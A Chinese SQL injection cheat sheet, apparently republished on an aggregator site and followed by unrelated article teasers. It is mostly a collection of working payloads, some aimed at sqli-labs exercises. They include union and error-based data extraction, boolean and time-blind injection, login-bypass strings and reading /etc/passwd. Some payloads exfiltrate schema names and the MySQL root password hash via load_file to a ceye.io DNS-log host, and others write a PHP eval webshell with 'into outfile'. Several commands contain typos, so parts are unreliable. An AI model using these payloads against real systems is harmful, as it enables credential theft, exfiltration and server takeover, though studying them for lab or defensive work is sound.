mysql 常用注入命令_SQL注入常用命令

1. 数据库查询版本

Mssql select @@version

Mysql select vresion()/select @@version

oracle select banner from ¥version

Postgresql select version()

2. 数据库常用命令

库操作

连接数据库 mysql -u 用户名 -p

创建数据库:create database 数据库名称、

删除数据库 drop database 数据库名称、

列出数据库 show databases

使用数据据库 use 数据库名称、

查看当前数据库 select database()

表操作

新建表create table 表名(键 varchar(10),键int(10))

列出表 show tables

删除表 delete 表名

数据操作

增加数据insert into 表名(键,键)values(值,值)

删除数据 delete from 表名 where 键=值(删除某一行数据)

修改数据 updata 表名 set 键 = 值 where 键=值

查询数据 select * fom 表名

存放数据库 information_ schema(存放schemata、 table、columns等等)

存放数据库名 schemata

表 table

字段 columns

3. SQL手工注入步骤

注入点寻找

判断请求方式

浏览器F12 点网络

单引号闭合’ ‘

数字

单引号括号闭合(’ ‘)

双引号括号闭合(“ ”)

or 1=1

or 1=2

and 1=1

and 1=2

数字型注入

加单引号 错误出异常

and 1=1 正常

and 1=2 异常

字符型注入

加单引号 错误出异常

and ‘1’ = '1 正常

and ‘1’ = '2 异常

判断字段长度

order by 数字 可以判断字段的个数

也可以用猜字段 union select 1,2,3

判断字段回显位置

在链接后面添加语句【 union select 1,2,3,4,5,6,7,8,9,10,11#】进行联合查询(联合查询时记得把前面的查询为空)来暴露可查询的字段号。

判断数据库注入

利用内置函数暴数据库信息

version()版本;database()数据库;user()用户;

不用猜解可用字段暴数据库信息(有些网站不适用):

and 1=2 union all select version()

and 1=2 union all select database()

and 1=2 union all select user()

操作系统信息:and 1=2 union all select @@global.version_compile_os from mysql.user

数据库权限:

and ord(mid(user(),1,1))=114 返回正常说明为root

查找数据库名

GET:IP/Less-1/?id=100’ union select 1,(select database()),3–+

POST:union select 1,(select group_concat(schema_name) from information_schema.schemata),3–+

查看数据库长度length() and length(database())>10–+

查看数据库名字mid()或者left

mid (string,start,length)返回指定的字符串从指定位置开始(可以用来猜数据库名 ) and mid(database(),1,1)>‘a’

left (string,lenth) 返回最左边指定的字符数

and left(database(),1)>‘a’ (猜名字)

将查到的库名放到同一个字符串

select GROUP_CONCAT(schema_name) from information_schema.schemata

查到数单个据库名发送到ceye

union select 1,(select load_file(concat(’\\’,substr((select schema_name from information_schema.schemata limit 1),1,41),’.mysql.ip.port.38ljf2.ceye.io\abc’)))–+

查找数据表

union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’) ,3

将单个表名发送到ceye

uname=1’) union select 3,(select load_file(concat(’\\’,substr((select table_name from information_schema.tables where table_schema =‘security’ limit 1),1,41),’.mysql.ip.port.38ljf2.ceye.io\abc’)))–+

查找数据表中所有字段(列)

127.0.0.1/Less-3/?id=100’) union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’) --+

获取内容

union select 1,(select group_concat(username) from security.users limit 0,1),3

查询某一个表的字段名发送到ceye

union select 1,(select load_file(concat(’\\’,substr((select column_name from information_schema.columns where table_name=‘users’ and table_schema=‘security’ limit 1),1,41),’.mysql.ip.port.38ljf2.ceye.io\abc’)))–+

猜解账号密码

outfile文件注入

union select 1,’<?php @eval($_POST[360]);?>’ into outfile ‘C:\phpStudy\PHPTutorial\WWW\Less-8\3.php’–+

into outfile ‘C:\phpStudy\PHPTutorial\WWW\Less-13\1.txt’

查root密码ceye代码

127.0.0.1/Less-1/?id=1’ union SELECT 1,(LOAD_FILE(CONCAT(’\\’,mid((SELECT password FROM mysql.user WHERE user=‘root’ LIMIT 1),2,41),’.mysql.ip.port.38ljf2.ceye.io\abc’))),3–+

bug

uname=1’) or 1=1 into outfile ‘C:\phpStudy\PHPTutorial\WWW\Less-13\1.txt’;–+

这个文件里会有所有的用户名和密码

查询数据

union select 1,(select 1 from (select count(*),concat((select(select(select distinct concat(username,password) from users limit 0,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

绕过登陆验证

admin’ –

admin’ #

admin’/*

’ or 1=1–

’ or 1=1#

’ or 1=1/*

') or ‘1’='1–

') or (‘1’='1–

SQL注入常见函数

group_concat函数 可以把查询的内容组合成一个字符串

load_file(file name ) 读取文件并将文件按字符串返回

left(string,length)返回最左边指定的字符数:

left(database(),1)>‘s’ (猜名字)

length()判断长度

length(database()>5

substr(a,b,c)从字符串a中截取 b到c长度

ascii()将某个字符转为ascii值

ascii(substr(user(),1,1))=101#

mid((a,b,c)从字符串a中截取 b到c位置(可以用来猜数据库名 )

4.SQL注入手册

SQL注入常用命令

查看当前用户:union select 1,(select user())–+

查看数据库版本:union select 1,(select version())–+

查看当前数据库名:union select 1,(select database())–+

查看操作系统union select 1,(select @@version_compile_os)–+

所有用户:

union select 1,(select group_concat(user) from mysql.user)–

用户hash

union select 1,(select group_concat(password) from mysql.user where user=‘root’)

查看所有数据库名

union select 1,(SELECT group_concat(schema_name) from information_schema.schemata)–+

查看某一个库的全部表

union select 1,(SELECT group_concat(table_name) from information_schema.tables where table_schema=‘库名’)–+

union select 1,(SELECT group_concat(table_name) from information_schema.table_constraints where table_schema=‘库名’

查看某个表的字段名

union select 1,(SELECT group_concat(column_name) from information_schema.columns where table_name=‘表名’)–+

查看某个库中某个表的字段名

union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘表名’ and table_schema=‘库名’)–+

读文件

union select 1,(SELECT load_file(’/etc/passwd’))–+

写文件

union select 1,’<?php @eval($_POST[360]);?>’ into outfile ‘C:\phpStudy\PHPTutorial\WWW\Less-8\3.php’–+

UNION注入

猜字段长度

order by 数字 uname=1’ order by 2

暴字段位置

union select 1,2 uname=1’ union select 1,2

在指定表中查询制指定用户的密码

union SELECT 1,password from 表 where username=‘用户名’–+

报错注入

floor (SELECT user()可修改)

OR (SELECT 8627 FROM(SELECT COUNT(*),CONCAT(0x70307e,(SELECT user()),0x7e7030,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)–+

ExtractValue(有长度限制,最长32位) (select @@version可修改)

and extractvalue(1, concat(0x7e, (select @@version),0x7e))–+

UpdateXml(有长度限制,最长32位) (SELECT @@version可修改)

and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)–+

NAME_CONST(适用于低版本,不太好用)

and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)–+

Error based Double Query Injection

or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1–+

exp(5.5.5以上) (select user()可修改)

and (select exp(~(select * from(select user())x)))–+

floor(Mysql): and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

Extractvalue(Mysql): and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

Updatexml(Mysql): and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

EXP: and exp(~(select * from(select user())a));

UTL INADDR. get host address(Oracle): and 1=utl inaddrget host address(select bannerO from sys.v_$version where rownum=1))

multipoint(Mysql):and multipoint((select * from(select * from(select user())a)b));

polygon(Mysql):and polygon((select * from(select * from(select user())a)b));

multipolygon(Mysql):and multipolygon((select * from(select * from(select user())a)b));

linestring(Mysql):and linestring((select * from(select * from(select user())a)b));

multilinestring(Mysql):and multilinestring((select * from(select * from(select user())a)b));

bool盲注

盲注的时候一定注意,MySQL4之后大小写不敏感,可使用binary()函数使大小写敏感。

布尔条件构造

//正常情况

'or bool#

true'and bool#

//不使用空格、注释

'or(bool)='1

true'and(bool)='1

//不使用or、and、注释

'^!(bool)='1

'=(bool)='

'||(bool)='1

true'%26%26(bool)='1

'=if((bool),1,0)='0

//不使用等号、空格、注释

'or(bool)<>'0

'or((bool)in(1))or'0

//其他

or (case when (bool) then 1 else 0 end)

有时候where字句有括号又猜不到SQL语句的时候,可以有下列类似的fuzz

1' or (bool) or '1'='1

1%' and (bool) or 1=1 and '1'='1

构造逻辑判断

逻辑判断基本就那些函数:

left(user(),1)>'r'

right(user(),1)>'r'

substr(user(),1,1)='r'

mid(user(),1,1)='r'

//不使用逗号

user() regexp '^[a-z]'

user() like 'root%'

POSITION('root' in user())

mid(user() from 1 for 1)='r'

mid(user() from 1)='r'

利用order by盲注

mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3;

+----+--------------+------------------------

| id | username | password

+----+--------------+------------------------

| 1 | 2 | 5

| 1 | admin | 51b7a76d51e70b419f60d34

+----+----------- --+------------------------

2 rows in set (0.00 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'6' order by 3;

+-----+-----------+--------------------------

|id | username | password

+-----+-----------+--------------------------

| 1 | admin |51b7a76d51e70b419f60d3

| 1 | 2 | 6

+-----+-----------+--------------------------

2 rows in set (0.01 sec)

延时盲注

相对于bool盲注,就是把返回值0和1改为是否执行延时,能用其他方法就不使用延时。

一般格式if((bool),sleep(3),0)和or (case when (bool) then sleep(3) else 0 end)

两个函数:

BENCHMARK(100000,MD5(1))

sleep(5)

BENCHMARK()用于测试函数的性能,参数一为次数,二为要执行的表达式。可以让函数执行若干次,返回结果比平时要长,通过时间长短的变化,判断语句是否执行成功。这是一种边信道攻击,在运行过程中占用大量的cpu资源。推荐使用sleep()

Mysql注释符

1. -- -

2. /* .... */

3. #

4. `

5. ;%00

GBK绕过注入

在分号前加%df%27

示例:id=1%d%27 union select 1.2–+

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/475298.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

VirtualBox的Linux虚拟机访问Windows7的文件

第一步&#xff1a; 安装 VirtualBox 增强工具 点击确定&#xff0c;稍等片刻&#xff0c;VirtualBox 的增强功能就可以安装完毕。 第2步&#xff1a;设置要共享给Linux 虚拟机的文件夹&#xff08;目录&#xff09; 点击右下角的“分配数据空间” 点击“添加” 选择要共享的路…

LeetCode 1118. 一月有多少天(闰年判断)

文章目录1. 题目2. 解题1. 题目 指定年份 Y 和月份 M&#xff0c;请你帮忙计算出该月一共有多少天。 示例 1&#xff1a; 输入&#xff1a;Y 1992, M 7 输出&#xff1a;31示例 2&#xff1a; 输入&#xff1a;Y 2000, M 2 输出&#xff1a;29示例 3&#xff1a; 输入&am…

vue warning如何去掉_详解 vue 组件三大核心概念

前言本文主要介绍属性、事件和插槽这三个vue基础概念、使用方法及其容易被忽略的一些重要细节。如果你阅读别人写的组件&#xff0c;可以从这三个部分展开&#xff0c;它们可以帮助你快速了解一个组件的所有功能。本文的代码请猛戳https://github.com/ljianshu/Blog&#xff0c…

碰撞代码

碰撞代码&#xff1a;if(CGRectContainsPoint(sprite.boundingBoy, touchLocation)){[self checkTheSprites:sprite]} 转载于:https://www.cnblogs.com/ligun123/archive/2012/02/08/2343035.html

LeetCode 1133. 最大唯一数

文章目录1. 题目2. 解题1. 题目 给你一个整数数组 A&#xff0c;请找出并返回在该数组中仅出现一次的最大整数。 如果不存在这个只出现一次的整数&#xff0c;则返回 -1。 示例 1&#xff1a; 输入&#xff1a;[5,7,3,9,4,9,8,3,1] 输出&#xff1a;8 解释&#xff1a; 数组…

firewall mysql端口_Centos7 firewall开放3306端口

Centos7 firewall开放3306端口在 Centos 7 中防火墙由 firewalld 来管理&#xff0c;而不是 iptables。1. 查看防火墙状态firewall-cmd --state ## 结果显示为running或not running2. 关闭防火墙firewallsystemctl stop firewalld.servicesystemctl disable firewalld.service3…

技术演讲的技巧和经验

导读&#xff1a;如果你在编程大会上发表演讲&#xff0c;不论是开放式的BarCamp或是像OSCON那样精心组织的大型会议&#xff0c;你只有很短的一段时间将脑中的信息传达给听众&#xff0c;所以请仔细把握。 技术会议的成本非常昂贵&#xff0c;不仅仅是经济上的成本。即使像Bar…

如何使用kali来进行一次ddos攻击

本文章用于记录自己的学习路线&#xff0c;不用于其他任何途径! ! ! 哈喽啊&#xff01;又是好久不见&#xff0c;本博主在之前发过一个ddos攻击的介绍。 emm…虽然那篇文章也提到了ddos攻击的方式&#xff0c;但太过于简陋&#xff0c;好像也没有什么用&#xff0c;so&#…

LeetCode 256. 粉刷房子(DP)

文章目录1. 题目2. 解题1. 题目 假如有一排房子&#xff0c;共 n 个&#xff0c;每个房子可以被粉刷成红色、蓝色或者绿色这三种颜色中的一种&#xff0c;你需要粉刷所有的房子并且使其与相邻的两个房子颜色不能相同。 当然&#xff0c;因为市场上不同颜色油漆的价格不同&…

flare3d_clone

flare3d_clone (1)克隆 model.clone() var clone:Mesh3D pivot3D.clone() as Mesh3D;clone.addEventListener( MouseEvent3D.MOUSE_OVER, mouseOverEvent ); //鼠标放在上面clone.addEventListener( MouseEvent3D.MOUSE_OUT, mouseOutEvent );    //鼠标移开clone.addE…

LeetCode 1099. 小于 K 的两数之和(二分查找)

文章目录1. 题目2. 解题2.1 暴力2.2 二分查找1. 题目 给你一个整数数组 A 和一个整数 K&#xff0c;请在该数组中找出两个元素&#xff0c;使它们的和小于 K 但尽可能地接近 K&#xff0c;返回这两个元素的和。 如不存在这样的两个元素&#xff0c;请返回 -1。 示例 1&#…

sonarqube使用mysql_SonarQube的安装、配置与使用

SonarQube是管理代码质量一个开放平台&#xff0c;可以快速的定位代码中潜在的或者明显的错误&#xff0c;下面将会介绍一下这个工具的安装、配置以及使用。准备工作&#xff1b;1、jdk(不再介绍)2、sonarqube&#xff1a;http://www.sonarqube.org/downloads/3、SonarQubeScan…

windows phone7 学习笔记14——地理位置服务与反应性扩展框架

使用Location Service能帮助开发者为windows Phone 开发具备位置感知&#xff08;Location-Aware)功能的应用程序。比如很多导航的软件&#xff0c;查找附近吃饭、娱乐甚至厕所的应用程序&#xff0c;都是基于这个服务的。 我们有3种方法来获取设备的位置。GPS&#xff0c;移动…

LeetCode 1228. 等差数列中缺失的数字

文章目录1. 题目2. 解题1. 题目 有一个数组&#xff0c;其中的值符合等差数列的数值规律&#xff0c;也就是说&#xff1a; 在 0 < i < arr.length - 1 的前提下&#xff0c;arr[i1] - arr[i] 的值都相等。 我们会从该数组中删除一个 既不是第一个 也 不是最后一个的值…

离散系数的计算公式_如何求不同变量之间的离散程度

变异系数前面介绍的极差、方差和标准差都是反映一组数值变异程度的绝对值&#xff0c;其数值的大小&#xff0c;不仅取决于数值的变异程度&#xff0c;而且还与变量值水平的高低、计量单位的不同有关。所以&#xff0c;不宜直接利用上述变异指标对不同水平、不同计量单位的现象…

sql server 海量数据速度提升:SQL优化-索引(9) 【转】

8、union并不绝对比or的执行效率高 我们前面已经谈到了在where子句中使用or会引起全表扫描&#xff0c;一般的&#xff0c;我所见过的资料都是推荐这里用union来代替or。事实证明&#xff0c;这种说法对于大部分都是适用的。 select gid,fariqi,neibuyonghu,reader,title from …

LeetCode 252. 会议室(排序)

文章目录1. 题目2. 解题1. 题目 给定一个会议时间安排的数组&#xff0c;每个会议时间都会包括开始和结束的时间 [[s1,e1],[s2,e2],...] (si < ei)&#xff0c;请你判断一个人是否能够参加这里面的全部会议。 示例 1: 输入: [[0,30],[5,10],[15,20]] 输出: false示例 2: 输…

jedis连接mysql_使用Jedis操作Redis数据库

Redis不仅是使用命令来操作&#xff0c;现在基本上主流的语言都有客户端支持&#xff0c;比如java、C、C#、C、php、Node.js、Go等。 在官方网站里列一些Java的客户端&#xff0c;有Jedis、Redisson、Jredis、JDBC-Redis、等其中官方推荐使用Jedis和Redisson。 在企业中用的最多…

LeetCode 1243. 数组变换

文章目录1. 题目2. 解题1. 题目 首先&#xff0c;给你一个初始数组 arr。然后&#xff0c;每天你都要根据前一天的数组生成一个新的数组。 第 i 天所生成的数组&#xff0c;是由你对第 i-1 天的数组进行如下操作所得的&#xff1a; 假如一个元素小于它的左右邻居&#xff0c…

mysql5.7.17二进制包_mysql5.7二进制包安装方法

1.部署tar xf mysql-5.7.17-linux-glibc2.5-x86_64.tar.gzmv mysql-5.7.17-linux-glibc2.5-x86_64 /application/mysql-5.7.17ln -s /application/mysql-5.7.17 /application/mysql2.授权chown -R mysql.mysql /application/mysql-5.7.173.初始化/application/mysql-5.7.17/bin…